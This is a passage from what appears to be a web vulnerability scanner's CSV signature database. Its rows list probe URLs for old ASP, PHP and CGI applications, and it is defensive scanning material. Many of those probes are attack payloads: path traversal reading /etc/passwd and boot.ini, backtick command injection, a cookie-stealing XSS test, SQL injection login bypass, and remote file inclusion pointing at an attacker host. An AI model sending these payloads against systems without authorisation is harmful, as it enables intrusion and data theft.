scanner.\",\"\",\"\"\n\"002453\",\"3093\",\"1\",\"/forum_arc.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002454\",\"3093\",\"1\",\"/forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002455\",\"3093\",\"1\",\"/forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002456\",\"3093\",\"1\",\"/forum_arc.asp?n=268\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002457\",\"3093\",\"1\",\"/forum_arc.asp?n=c:\\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002458\",\"3093\",\"1\",\"/forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002459\",\"3093\",\"1\",\"/forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002460\",\"3093\",\"1\",\"/forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002461\",\"3093\",\"1\",\"/forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002462\",\"3093\",\"1\",\"/forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002463\",\"3093\",\"1\",\"/forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002464\",\"3093\",\"1\",\"/forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002465\",\"3093\",\"1\",\"/forum_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002466\",\"3093\",\"1\",\"/forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002467\",\"3093\",\"1\",\"/forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002468\",\"3093\",\"1\",\"/forum_professionnel.asp?n=100\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002469\",\"3093\",\"1\",\"/forum_professionnel.asp?n=c:\\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002470\",\"3093\",\"1\",\"/functions.inc.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002471\",\"10447\",\"3\",\"/get_od_toc.pl?Profile=\",\"GET\",\"PROGRA~1\",\"200\",\"\",\"\",\"\",\"WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.\",\"\",\"\"\n\"002472\",\"3093\",\"1\",\"/globals.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002473\",\"3093\",\"1\",\"/globals.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002474\",\"6656\",\"6\",\"/Gozila.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.\",\"\",\"\"\n\"002475\",\"1963\",\"c\",\"/helperfunction.php?includedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"phpAdsNew or SIPS helperfunction.php maybe vulnerable to remote file inclusion.\",\"\",\"\"\n\"002476\",\"3093\",\"1\",\"/homebet/homebet.dll?form=menu&amp;option=menu-signin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002477\",\"27908\",\"c\",\"/htmltonuke.php?filnavn=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"HTMLtoNuke filnavn variable allows remote file inclusion.\",\"\",\"\"\n\"002478\",\"3093\",\"1\",\"/idealbb/error.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002479\",\"3093\",\"1\",\"/iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002480\",\"3093\",\"1\",\"/imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002481\",\"3093\",\"1\",\"/imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002482\",\"3093\",\"1\",\"/imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002483\",\"3093\",\"1\",\"/imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002484\",\"3093\",\"1\",\"/imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002485\",\"3093\",\"1\",\"/imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002486\",\"3093\",\"1\",\"/imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002487\",\"3093\",\"1\",\"/imprimer.asp?no=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002488\",\"3093\",\"1\",\"/imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002489\",\"3093\",\"1\",\"/imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002490\",\"3093\",\"1\",\"/imprimer.asp?no=c:\\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002491\",\"3093\",\"1\",\"/include/customize.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002492\",\"3093\",\"1\",\"/include/help.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002493\",\"3093\",\"1\",\"/includes/footer.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002494\",\"3093\",\"1\",\"/includes/header.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002500\",\"3093\",\"1\",\"/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20\",\"GET\",\"alert\\\\\\(document\\.cookie\\\\\\)\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002501\",\"3093\",\"1\",\"/infos/contact/index.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002502\",\"3093\",\"1\",\"/infos/faq/index.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002503\",\"3093\",\"1\",\"/infos/gen/index.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002504\",\"3093\",\"1\",\"/infos/services/index.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002505\",\"3093\",\"1\",\"/instaboard/index.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002506\",\"3093\",\"1\",\"/intranet/browse.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002507\",\"3093\",\"1\",\"/invitefriends.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002508\",\"3093\",\"1\",\"/ipchat.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002509\",\"3093\",\"1\",\"/ixmail_netattach.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002510\",\"3093\",\"1\",\"/jsptest.jsp+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002511\",\"3093\",\"1\",\"/kernel/class/delete.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002512\",\"3093\",\"1\",\"/kernel/classes/ezrole.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002513\",\"3093\",\"1\",\"/ldap.search.php3?ldap_serv=nonsense%20\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002514\",\"3093\",\"1\",\"/livredor/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002515\",\"3093\",\"1\",\"/login.php3?reason=chpass2%20\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002516\",\"3093\",\"1\",\"/mail/include.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002517\",\"3093\",\"1\",\"/mail/settings.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002518\",\"3093\",\"1\",\"/mail/src/read_body.php\",\"GET\",\"Project\\sTeam\",\"\",\"\",\"\",\"\",\"SquirrelMail found\",\"\",\"\"\n\"002519\",\"3093\",\"1\",\"/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002520\",\"3093\",\"1\",\"/mambo/banners.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002521\",\"3093\",\"1\",\"/manage/login.asp+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002522\",\"3093\",\"1\",\"/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002523\",\"3093\",\"1\",\"/members/ID.pm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002524\",\"3093\",\"1\",\"/members/ID.xbb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002525\",\"3093\",\"1\",\"/mod.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002526\",\"3093\",\"1\",\"/modif/delete.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002527\",\"3093\",\"1\",\"/modif/ident.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002528\",\"3093\",\"1\",\"/modif_infos.asp?n=%60/etc/passwd%60\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002529\",\"3093\",\"1\",\"/modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002530\",\"3093\",\"1\",\"/modif_infos.asp?n=../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002531\",\"3093\",\"1\",\"/modif_infos.asp?n=/....../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002532\",\"3093\",\"1\",\"/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002533\",\"3093\",\"1\",\"/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002534\",\"3093\",\"1\",\"/modif_infos.asp?n=/../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002535\",\"3093\",\"1\",\"/modif_infos.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002536\",\"3093\",\"1\",\"/modif_infos.asp?n=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002537\",\"3093\",\"1\",\"/modif_infos.asp?n=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002538\",\"3093\",\"1\",\"/modif_infos.asp?n=c:\\boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002539\",\"3093\",\"1\",\"/modules/Downloads/voteinclude.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002540\",\"3093\",\"1\",\"/modules/Forums/attachment.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002541\",\"3093\",\"1\",\"/modules/Search/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002542\",\"3093\",\"1\",\"/modules/WebChat/in.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002543\",\"3093\",\"1\",\"/modules/WebChat/out.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002544\",\"3093\",\"1\",\"/modules/WebChat/quit.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002545\",\"3093\",\"1\",\"/modules/WebChat/users.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002546\",\"3093\",\"1\",\"/modules/Your_Account/navbar.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002547\",\"3093\",\"1\",\"/moregroupware/modules/webmail2/inc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002548\",\"3093\",\"1\",\"/msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"Access Denied\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002549\",\"3093\",\"1\",\"/myguestBk/add1.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002550\",\"3093\",\"1\",\"/myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002551\",\"3093\",\"1\",\"/myguestBk/admin/index.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002552\",\"3093\",\"1\",\"/netget?sid=Safety&amp;msg=2002&amp;file=Safety\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002553\",\"3093\",\"1\",\"/newtopic.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002554\",\"3093\",\"1\",\"/nphp/nphpd.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002555\",\"3093\",\"1\",\"/OpenTopic\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002556\",\"3093\",\"1\",\"/options.inc.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002557\",\"3093\",\"1\",\"/oscommerce/default.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002558\",\"3093\",\"1\",\"/parse_xml.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002559\",\"3093\",\"1\",\"/php/gaestebuch/admin/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002560\",\"3093\",\"1\",\"/php/php4ts.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002561\",\"3093\",\"1\",\"/pks/lookup\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002562\",\"3093\",\"1\",\"/pm/lib.inc.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002563\",\"3093\",\"1\",\"/poppassd.php3+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002564\",\"3093\",\"1\",\"/produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002565\",\"3093\",\"1\",\"/productcart/database/EIPC.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002566\",\"3093\",\"1\",\"/productcart/pc/Custva.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002567\",\"3093\",\"1\",\"/ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002568\",\"3093\",\"1\",\"/product_info.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002569\",\"3093\",\"1\",\"/prometheus-all/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002571\",\"3093\",\"1\",\"/protected/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002572\",\"3093\",\"1\",\"/protected/secret.html+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002573\",\"3093\",\"1\",\"/protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002574\",\"3093\",\"1\",\"/protection.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002575\",\"3093\",\"1\",\"/pt_config.inc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002576\",\"3093\",\"1\",\"/pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002577\",\"3093\",\"1\",\"/pvote/del.php?pollorder=1%20\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002578\",\"3093\",\"1\",\"/quikmail/nph-emumail.cgi?type=../%00\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002579\",\"3093\",\"1\",\"/room/save_item.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002580\",\"3093\",\"1\",\"/rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown 